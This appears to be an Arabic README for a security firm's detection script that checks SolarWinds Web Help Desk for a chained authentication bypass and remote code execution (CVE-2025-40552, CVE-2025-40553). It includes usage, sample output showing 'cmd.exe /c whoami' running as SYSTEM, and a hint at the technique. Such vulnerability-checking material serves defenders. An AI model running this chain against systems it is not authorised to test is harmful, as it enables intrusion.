
أداة توليد أدلة الكشف عن سلسلة استغلال تنفيذ التعليمات البرمجية عن بُعد قبل المصادقة في SolarWinds Web Help Desk
يقوم مولّد أدلة الكشف هذا بالتحقق مما إذا كان مثيل SolarWinds Web Help Desk معرضًا لثغرات CVE-2025-40552 وCVE-2025-40553.
يحاول مولّد أدلة الكشف تنفيذ عمليتين:
cmd.exe /c whoami - هذا الفحص ليس دقيقًا 100%، لأنه يعتمد على رسائل الخطأ التي قد تختلف حسب البيئة.تنبيه - أثناء اختبار RCE، سيقوم البرنامج النصي بإنشاء جدول SWWHDDAG<random_8_characters> في قاعدة بيانات postgres.
بعد الاختبار، يمكنك التحقق مما إذا كان مخرَج الأمر موجودًا في قاعدة البيانات:
> SELECT * FROM public.swwhddagmm2t6t79
"output"
"nt authoritysystem"
اختبار ضد مثيل معرّض للثغرة:
$ python3 watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py -H https://vulnerable.lab:8443
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py
(*) CVE-2025-40552 + CVE-2025-40553 Pre-Auth RCE Chain in SolarWinds Web Help Desk - Detection Artifact Generator
- Piotr Bazydlo (@chudyPB) of watchTowr
CVEs: CVE-2025-40552 and CVE-2025-40553
[+] Testing CVE-2025-40552 Authentication Bypass
[+] Triggering error and poisoning context cache with LookAndFeelPref
[+] VULNERABLE to CVE-2025-40552 Authentication Bypass
[+] Testing CVE-2025-40553 RCE
[+] This stage will create SWWHDDAGp08zwfs6 DB table if successful
[+] Verifying deserialization and serialization of org.apache.commons.dbcp2.BasicDataSource
[+] PROBABLY VULNERABLE: Connection validated and SQL queries can be executed
[+] Executing "cmd.exe /c whoami" - verify locally if it worked
اختبار ضد مثيل غير معرّض للثغرة:
$ python3 watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py -H https://notvulnerable.lab:8443
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py
(*) CVE-2025-40552 + CVE-2025-40553 Pre-Auth RCE Chain in SolarWinds Web Help Desk - Detection Artifact Generator
- Piotr Bazydlo (@chudyPB) of watchTowr
CVEs: CVE-2025-40552 and CVE-2025-40553
[+] Testing CVE-2025-40552 Authentication Bypass
[+] Triggering error and poisoning context cache with LookAndFeelPref
[-] NOT VULNERABLE to CVE-2025-40552, exiting
< SolarWinds Web Help Desk 2026.1
لأحدث الأبحاث الأمنية، تابع فريق مختبرات watchTowr